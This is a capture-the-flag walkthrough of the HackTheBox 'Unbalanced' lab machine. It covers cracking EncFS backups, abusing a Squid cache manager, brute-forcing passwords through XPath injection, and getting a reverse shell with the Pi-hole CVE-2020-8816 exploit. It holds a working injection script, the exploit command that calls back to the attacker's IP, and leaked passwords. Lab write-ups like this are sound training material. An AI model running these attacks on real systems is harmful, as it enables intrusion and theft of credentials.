Welcome back, folks. This writeup is about the HackTheBox Unbalanced machine (10.10.10.200), which was released last Saturday.
Initial Foothold and the user
The initial foothold came from spotting rsync in the Nmap scan and downloading the rsync directories, only to find them encrypted. Cracking the encrypted directories with John reveals the hidden configuration files, which led me to gain control over the Squid proxy. Getting the user was harder than getting root: an XPath vulnerability in the login page ultimately reveals the credentials, so I was finally able to SSH in and get the user. Deep enumeration is a must.
The Root
The user Bryan has a TO-DO list that reveals an incomplete part of the application he is developing. Further enumeration shows that the application is Pi-hole and that the installed version is vulnerable; a public exploit gives a reverse shell, and a bash script then reveals an administrator password that allows privilege escalation to root.
Let me make one thing clear first: this machine is *insane*.
OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200
Enumeration
As a best practice, I added the machine IP to my hosts file as unbalanced.htb and started off with an Nmap scan. The scan reveals that ports 22, 873 and 3128 are open. Strangely, neither port 80 nor 8080 is open.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
RSync
As the rsync port is open and the service is running, I went ahead and listed the modules:
root@nav1n:~/htb/unbalanced # rsync -a rsync://unbalanced.htb:873
conf_backups EncFS-encrypted configuration backups
root@nav1n:~/htb/unbalanced #
Let us download the directory and analyze it.
root@nav1n:~/htb/unbalanced # rsync -av rsync://unbalanced.htb/conf_backups conf_backups
receiving incremental file list
created directory conf_backups
./
======snip======== (encrypted file names omitted)
sent 1,452 bytes received 411,990 bytes 33,075.36 bytes/sec
total size is 405,603 speedup is 0.98
root@nav1n:~/htb/unbalanced #
After downloading the files and doing some analysis, I figured out that this is an EncFS-encrypted file system. I also found an .encfs6.xml file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
<cfg class_id="0" tracking_level="0" version="20">
<version>20100713</version>
<creator>EncFS 1.9.5</creator>
<cipherAlg class_id="1" tracking_level="0" version="0">
<name>ssl/aes</name>
<major>3</major>
<minor>0</minor>
</cipherAlg>
<nameAlg>
<name>nameio/block</name>
<major>4</major>
<minor>0</minor>
</nameAlg>
<keySize>192</keySize>
<blockSize>1024</blockSize>
<plainData>0</plainData>
<uniqueIV>1</uniqueIV>
<chainedNameIV>1</chainedNameIV>
<externalIVChaining>0</externalIVChaining>
<blockMACBytes>0</blockMACBytes>
<blockMACRandBytes>0</blockMACRandBytes>
<allowHoles>1</allowHoles>
<encodedKeySize>44</encodedKeySize>
<encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
<saltLen>20</saltLen>
<saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
<kdfIterations>580280</kdfIterations>
<desiredKDFDuration>500</desiredKDFDuration>
</cfg>
</boost_serialization>
The XML file contains the volume metadata and the encoded key data. Looking for a way to decrypt the files, I found a potential solution on GitHub: a Python script, encfs2john.py, that extracts a crackable hash from an EncFS volume. Following the documentation, I ran it against the encrypted folder conf_backups and got the hash:
root@nav1n:~/htb/unbalanced # python encfs2john.py conf_backups/ > unbalanced.hash
root@nav1n:~/htb/unbalanced # cat unbalanced.hash
conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
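As an added illustration (my own code, not part of the original writeup and not encfs2john itself), the following Python parses the .encfs6.xml shown above and makes the defender's point explicit: the salt, KDF parameters and encoded key it carries are everything an offline guess needs, so once the file leaks through the unauthenticated rsync module, passphrase strength is the only defence left. The XML text is copied from the file above; the hash field layout follows the encfs2john.py output line.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample: the .encfs6.xml from the conf_backups module, compacted.
SAMPLE_ENCFS6_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
<cfg class_id="0" tracking_level="0" version="20">
<version>20100713</version><creator>EncFS 1.9.5</creator>
<cipherAlg class_id="1" tracking_level="0" version="0">
<name>ssl/aes</name><major>3</major><minor>0</minor></cipherAlg>
<nameAlg><name>nameio/block</name><major>4</major><minor>0</minor></nameAlg>
<keySize>192</keySize><blockSize>1024</blockSize>
<uniqueIV>1</uniqueIV><chainedNameIV>1</chainedNameIV>
<blockMACBytes>0</blockMACBytes><blockMACRandBytes>0</blockMACRandBytes>
<encodedKeySize>44</encodedKeySize>
<encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
<saltLen>20</saltLen>
<saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
<kdfIterations>580280</kdfIterations>
</cfg>
</boost_serialization>
"""


def parse_encfs6(xml_text):
    """Return the security-relevant fields of an EncFS volume config."""
    cfg = ET.fromstring(xml_text.encode("utf-8")).find("cfg")

    def text(path):
        node = cfg.find(path)
        return node.text.strip() if node is not None and node.text else ""

    salt = base64.b64decode(text("saltData"))
    key = base64.b64decode(text("encodedKeyData"))
    info = {
        "creator": text("creator"),
        "cipher": text("cipherAlg/name"),
        "key_size_bits": int(text("keySize")),
        "kdf_iterations": int(text("kdfIterations")),
        "salt_len": int(text("saltLen")),
        "encoded_key_size": int(text("encodedKeySize")),
        "salt_hex": salt.hex(),
        "key_hex": key.hex(),
        "block_mac_bytes": int(text("blockMACBytes") or 0),
    }
    # The declared lengths must match the decoded blobs, or the file is damaged.
    if len(salt) != info["salt_len"] or len(key) != info["encoded_key_size"]:
        raise ValueError("salt/key length does not match declared size")
    return info


def encfs_john_line(info, label):
    """Assemble the line John's encfs format expects, in the layout seen in
    the encfs2john.py output above:
    label:$encfs$keySize*iterations*cipher*saltLen*saltHex*encKeySize*keyHex
    The cipher field is 0 for ssl/aes and 1 for ssl/blowfish."""
    cipher_id = 0 if info["cipher"] == "ssl/aes" else 1
    return "{}:$encfs${}*{}*{}*{}*{}*{}*{}".format(
        label, info["key_size_bits"], info["kdf_iterations"], cipher_id,
        info["salt_len"], info["salt_hex"], info["encoded_key_size"],
        info["key_hex"])


def exposure_findings(info):
    """Defender's view of what a leaked .encfs6.xml hands over."""
    findings = ["salt, KDF parameters and encoded key present: the passphrase "
                "can be guessed offline, so wordlist strength is the only limit"]
    if info["block_mac_bytes"] == 0:
        findings.append("blockMACBytes=0: ciphertext blocks carry no "
                        "integrity check")
    return findings
```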
Once I had the hash, I ran it through John with the rockyou wordlist to recover the passphrase. John cracked it successfully: bubblegum
root@nav1n:~/htb/unbalanced # john --wordlist=/usr/share/wordlists/rockyou.txt unbalanced.hash
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bubblegum (conf_backups/)
1g 0:00:00:43 DONE (2020-08-03 18:52) 0.02282g/s 16.43p/s 16.43c/s 16.43C/s bambam..marissa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@nav1n:~/htb/unbalanced #
Decrypting The Directory
To decrypt the encrypted directory, I need EncFS (Encrypted File System) installed locally. The GitHub repo has detailed documentation. I installed EncFS by following it, and after reading a couple of blog posts I understood how EncFS works. A quick search turned up an article showing how to mount an EncFS directory and decrypt it using the passphrase.
As I already have the passphrase, I mounted the encrypted directory and decrypted it. Going through the newly created conf_backups_decryped directory, I noticed a lot of *.conf files:
root@nav1n:~/htb/unbalanced # encfs /conf_backups/ /conf_backups_decryped/
EncFS Password:
root@nav1n:~/htb/unbalanced # cd conf_backups_decryped
root@nav1n:~/htb/unbalanced/conf_backups_decryped # ls -la
total 628
drwxr-xr-x 2 root root 4096 Apr 4 18:05 .
drwxr-xr-x 7 root root 4096 Aug 3 19:11 ..
-rw-r--r-- 1 root root 267 Apr 4 18:05 50-localauthority.conf
-rw-r--r-- 1 root root 455 Apr 4 18:05 50-nullbackend.conf
-rw-r--r-- 1 root root 48 Apr 4 18:05 51-debian-sudo.conf
-rw-r--r-- 1 root root 182 Apr 4 18:05 70debconf
-rw-r--r-- 1 root root 2351 Apr 4 18:05 99-sysctl.conf
-rw-r--r-- 1 root root 4564 Apr 4 18:05 access.conf
-rw-r--r-- 1 root root 2981 Apr 4 18:05 adduser.conf
-rw-r--r-- 1 root root 1456 Apr 4 18:05 bluetooth.conf
======snip========
Going through the list of files, I noticed squid.conf. This file caught my attention because the Nmap scan showed a Squid proxy running on port 3128 of the Unbalanced machine.
The configuration file contains the following:
The ACLs (access control lists):
acl localnet src 0.0.0.1-0.255.255.255 # RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8 # RFC 1918 local private network (LAN)
acl localnet src 100.64.0.0/10 # RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 # RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12 # RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16 # RFC 1918 local private network (LAN)
acl localnet src fc00::/7 # RFC 4193 local private network range
acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
A New Subdomain
I found a new subdomain, intranet.unbalanced.htb:
# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
# And finally deny all other access to this proxy
http_access deny all
#http_access allow all
Cache Manager Credentials
cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all
The Squid Proxy
The new subdomain intranet.unbalanced.htb can only be reached through the Squid proxy on port 3128, so I need to install Squid locally first.
Installed / Enabled and Running
Then, I updated the Firefox proxy settings to use the Unbalanced proxy:
Then I browsed to http://intranet.unbalanced.htb, but it didn't work: I was getting an "unable to load" error, and trying different proxy settings didn't help. After a few minutes of trial and error, I realized I was supposed to replace my local squid.conf with the one I found in the decrypted folder. I replaced the configuration file, restarted the squid service, browsed the page again, and there it was: the page opened.
The intranet page at http://intranet.unbalanced.htb:
GoBuster to Discover Files
As the login page didn't give me anything to exploit, I decided to run GoBuster to find files and directories that might be hidden from direct access. After running for a while, it found the following:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://intranet.unbalanced.htb
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] Proxy: http://10.10.10.200:3128
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,log,php,xml,cgi,htm
[+] Timeout: 10s
===============================================================
2020/08/03 20:12:22 Starting gobuster
===============================================================
/css (Status: 301) [Size: 194]
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/control.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/corba.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml (Status: 403) [Size: 178]
/index.php (Status: 302) [Size: 0]
/index.php (Status: 302) [Size: 0]
/intranet.php (Status: 200) [Size: 6736]
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/registered.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/rcs.htm: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml - 403
/index.php - 302
/intranet.php - 200
Except for intranet.php, the other two files could not be accessed, so I needed another way forward. I recalled the cache manager credential I found in the decrypted configuration earlier. Searching for the Squid cache manager, I found an article; based on it, I browsed a URL following this pattern:
http://mycache.example.com:3128/squid-internal-mgr/info
I got "access denied", which means there is still something here I could exploit.
Finding Different Hosts and Subnets in the Network
From the ACLs found earlier, I know there are other subnets in the network, possibly reachable only through Squid:
acl localnet src 100.64.0.0/10 # RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 # RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12 # RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16 # RFC 1918 local private network (LAN)
Referring to the same article again, I started looking for hosts within the subnets listed in the ACL, beginning with the class B range.
SquidClient Command:
squidclient is a tool I downloaded to issue Squid cache manager commands from my local machine. Since I already have the cache manager password, gathering information is easy:
root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
---snip----
Via: 1.1 unbalanced (squid/4.6)
Connection: close
index Cache Manager Interface disabled
menu Cache Manager Menu protected
offline_toggle Toggle offline_mode setting disabled
shutdown Shut Down the Squid Process disabled
reconfigure Reconfigure Squid disabled
rotate Rotate Squid Logs disabled
pconn Persistent Connection Utilization Histograms protected
mem Memory Utilization protected
diskd DISKD Stats protected
squidaio_counts Async IO Function Counters disabled
config Current Squid Configuration disabled
client_list Cache Client List disabled
comm_epoll_incoming comm_incoming() stats disabled
ipcache IP Cache Stats and Contents disabled
fqdncache FQDN Cache Stats and Contents protected
idns Internal DNS Statistics disabled
redirector URL Redirector Stats disabled
store_id StoreId helper Stats disabled
external_acl External ACL stats disabled
http_headers HTTP Header Statistics disabled
info General Runtime Information disabled
service_times Service Times (Percentiles) disabled
filedescriptors Process Filedescriptor Allocation protected
objects All Cache Objects protected
vm_objects In-Memory and In-Transit Objects protected
io Server-side network read() size histograms disabled
counters Traffic and Resource Counters protected
peer_select Peer Selection Algorithms disabled
digest_stats Cache Digest and ICP blob disabled
5min 5 Minute Average of Counters protected
60min 60 Minute Average of Counters protected
utilization Cache Utilization disabled
histograms Full Histogram Counts protected
active_requests Client-side Active Requests disabled
username_cache Active Cached Usernames disabled
openfd_objects Objects with Swapout files open disabled
store_digest Store Digest disabled
store_log_tags Histogram of store.log tags disabled
storedir Store Directory Stats disabled
store_io Store IO Interface Stats disabled
store_check_cachable_stats storeCheckCachable() Stats disabled
refresh Refresh Algorithm Statistics disabled
delay Delay Pool Levels disabled
forward Request Forwarding Statistics disabled
cbdata Callback Data Registry Contents protected
sbuf String-Buffer statistics protected
events Event Queue protected
netdb Network Measurement Database disabled
asndb AS Number Database disabled
carp CARP information disabled
userhash peer userhash information disabled
sourcehash peer sourcehash information disabled
server_list Peer Cache Statistics disabled
root@nav1n:~/htb/unbalanced #
Going further and analyzing the different menu entries, I found fqdncache. Since FQDN means fully qualified domain name, I decided to run it, and here is the result:
root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
---snip----
FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 9
FQDNcache Requests: 11573
FQDNcache Hits: 0
FQDNcache Negative Hits: 5333
FQDNcache Misses: 6240
FQDN Cache Contents:
Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
10.10.14.172 N -10704 0
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters
So I have two new hosts: intranet-host2.unbalanced.htb (172.31.179.2) and intranet-host3.unbalanced.htb (172.31.179.3). I was not able to access them by hostname, but the websites loaded via the IP address directly. Both are either replicas of the employee login page or redirect to the intranet portal I found earlier, http://intranet.unbalanced.htb.
I then loaded 172.31.179.1, the only IP in that range not listed among the host names, and was welcomed with the following error:
But if I add intranet.php to the URL, I again get the same login page I found earlier.
Testing the Login Vulnerability
As I normally do with login pages, I tried the same payload I use for SQLi, ' or ''='. Luckily this page was vulnerable, and I received the following users and their email IDs.
So the vulnerable login page reveals four users with their email IDs:
- Rita – rita@unbalanced.htb | HR Manager
- Jim – jim@unbalanced.htb | Web Designer
- Bryan – bryan@unbalanced.htb | System Administrator
- Sarah – sarah@unbalanced.htb | Team Leader
Since XPath injection is possible on the login page, I decided to brute-force the passwords. The payload has to test a single character at a time, comparing the response length against a known-false baseline:
The Script:
import requests

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
# character set tried at every password position
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita', 'jim', 'bryan', 'sarah']

for user in u:
    # baseline: substring(Password,0,1) is always empty, so this condition is
    # always false and gives the response length of a failed login
    data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
    request = requests.post(url, data=data, proxies={'http': proxy_url})
    b = len(request.text)
    cracked_pass = ''
    print('Attempting User {0}'.format(user))
    for i in range(1, 80):
        found = False
        for c in w:
            # true only when character i of the password equals c
            data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c + ""}
            request = requests.post(url, data=data, proxies={'http': proxy_url})
            if len(request.text) != b:
                found = True
                break
        if not found:
            # no character matched at this position: end of password
            break
        print('[+]Found character: {2}'.format(user, i, c))
        cracked_pass += c
    print(cracked_pass)
The script found the passwords of all four users.
root@nav1n:~/htb/unbalanced # python crack.py
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'
The passwords were not that helpful on the web page itself; it just displayed the username, job title and email, and that's it.
Getting the User Flag
Then I tried the same credentials over SSH to the Unbalanced box and found that the credentials matched for the user Bryan.
root@nav1n:~/htb/unbalanced # hydra -l users.txt -P pass.txt 10.10.10.200 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 01:13:37
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://10.10.10.200:22/
[22][ssh] host: 10.10.10.200 login: bryan password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 01:13:43
root@nav1n:~/htb/unbalanced #
I immediately SSHed into the box as Bryan. The user flag was in Bryan's home directory.
Having compromised the user, I proceeded to enumerate Bryan's home directory. I found a file called "TODO"; reading it showed the following:
bryan@unbalanced:~$ cat TODO
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]
###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$
As per the TO-DO list, Bryan has installed Pi-hole locally, listening on localhost only. A Pi-hole configuration script has been created but is not complete, and that is what leaves the door open. Pi-hole's ports are not exposed to the network, so I need to find which port it is listening on.
When I ran netstat I learned that it is not installed on the system, so I needed another way. I found an article in the cPanel forum that shows how to do netstat without netstat.
The command:
# netstatawk - from https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
netstatawk() { ( awk 'function hextodec(str,ret,n,i,k,c){
    ret = 0
    n = length(str)
    for (i = 1; i <= n; i++) {
        c = tolower(substr(str, i, 1))
        k = index("123456789abcdef", c)
        ret = ret * 16 + k
    }
    return ret
}
function getIP(str,ret){
    ret=hextodec(substr(str,index(str,":")-2,2));
    for (i=5; i>0; i-=2) {
        ret = ret"."hextodec(substr(str,i,2))
    }
    ret = ret":"hextodec(substr(str,index(str,":")+1,4))
    return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp ) }
I ran the command over the SSH session, and it showed me the listening ports. The result reveals that ports 8080 and 5553 are listening locally.
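As an added example (my own code, not from the writeup or the linked article), the Python below does the same little-endian decoding of /proc/net/tcp as the awk function above, but also decodes the socket state column so that only LISTEN entries are reported, and separates loopback-only listeners such as the two found here. The sample table is constructed to mirror what Bryan's shell would show; the addresses 10.10.10.200 and 10.10.14.22 are taken from the writeup.

```python
import socket
import struct

# Constructed sample of /proc/net/tcp: two loopback listeners (8080, 5553),
# sshd listening on all interfaces, and one established SSH session.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:15B1 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
   3: C80A0A0A:0016 160E0A0A:D4A2 01 00000000:00000000 00:00000000 00000000  1000        0 12348 1 0000000000000000 20 4 30 10 -1
"""

# Socket states as numbered by the Linux kernel (include/net/tcp_states.h).
TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING",
}


def decode_endpoint(hex_endpoint):
    """'0100007F:1F90' -> ('127.0.0.1', 8080).

    The kernel prints the IPv4 address as a little-endian 32-bit word, which
    is why the awk version walks the hex pairs backwards."""
    addr_hex, port_hex = hex_endpoint.split(":")
    addr = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return addr, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the table into rows with decoded endpoints and state names."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 8:
            continue
        rows.append({
            "local": decode_endpoint(fields[1]),
            "remote": decode_endpoint(fields[2]),
            "state": TCP_STATES.get(int(fields[3], 16), "UNKNOWN"),
            "uid": int(fields[7]),
        })
    return rows


def listening_sockets(rows):
    """(address, port) pairs in LISTEN state, sorted for stable output."""
    return sorted(r["local"] for r in rows if r["state"] == "LISTEN")


def loopback_only(rows):
    """Ports bound to 127.x only: services 'not exposed to the network',
    like the Pi-hole container in the TODO list."""
    return sorted(port for addr, port in listening_sockets(rows)
                  if addr.startswith("127."))


if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE_PROC_NET_TCP
    for addr, port in listening_sockets(parse_proc_net_tcp(table)):
        print("LISTEN {}:{}".format(addr, port))
```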
I ran curl to find which port is hosting Pi-hole. Port 5553 seems unresponsive, and curling port 8080 returns the error "Invalid domain!":
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:5553
curl: (28) Operation timed out after 10001 milliseconds with 0 bytes received
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
bryan@unbalanced:~$
Adding the Host header unbalanced, I got the following result:
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
* (c) 2017 Pi-hole, LLC (https://pi-hole.net)
------snip------
<footer><span>Monday 10:50 PM, August 03rd.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>
----snip-----
</body></html>
bryan@unbalanced:~$
The curl output reveals another subdomain, pihole.unbalanced.htb, running on the internal IP 172.31.11.3. Again access by hostname is disabled, but I was able to reach the web page through the IP directly.
As I know the Pi-hole dashboard lives at /admin, I browsed there and had the dashboard open.
I logged in at http://172.31.11.3/admin/index.php?login using the password "admin", as mentioned in the TODO list.
Admin Dashboard
Exploiting Pi-hole Version v4.3.2
Seeing the installed Pi-hole version 4.3.2, I knew there is an exploit for it: version 4.3.2 is vulnerable to RCE, tracked as CVE-2020-8816.
Looking for exploits, I found one by AndreyRainchik and downloaded it immediately. However, I was not able to run the exploit remotely, so I decided to run it locally by port-forwarding Pi-hole through SSH.
Getting a Reverse Shell as www-data
I ran the SSH port forward:
root@nav1n:~/htb/unbalanced # ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200
I started my listener, which receives the reverse shell once the exploit (CVE-2020-8816) runs, and launched the exploit from another terminal:
root@nav1n:~/htb/unbalanced # python3 CVE-2020-8816.py http://127.0.0.1:8080 admin 10.10.14.22 9999
And here is the reverse shell as www-data.
Going through the directories, I found that www-data is able to read /root/. That's insane. Inside /root/ there are a couple of files, ph_install.sh and pihole_config.sh. Without wasting time, I read pihole_config.sh and, as assumed, it contained the administrator user's credentials and email ID.
Root.txt
$ cat pihole_config.sh
#!/bin/bash
# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb
# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c
# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1
# Set privacy level
/usr/local/bin/pihole -a -l 4
# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$
Now that I have the admin credentials, I went back to the SSH session and used su to become root with the new password.
That's it. I just pwned the Unbalanced machine. Thank you for your visit, and I hope you enjoyed this insane ride.
References
- https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/
- https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8816
- https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof
- https://wiki.squid-cache.org/Features/CacheManager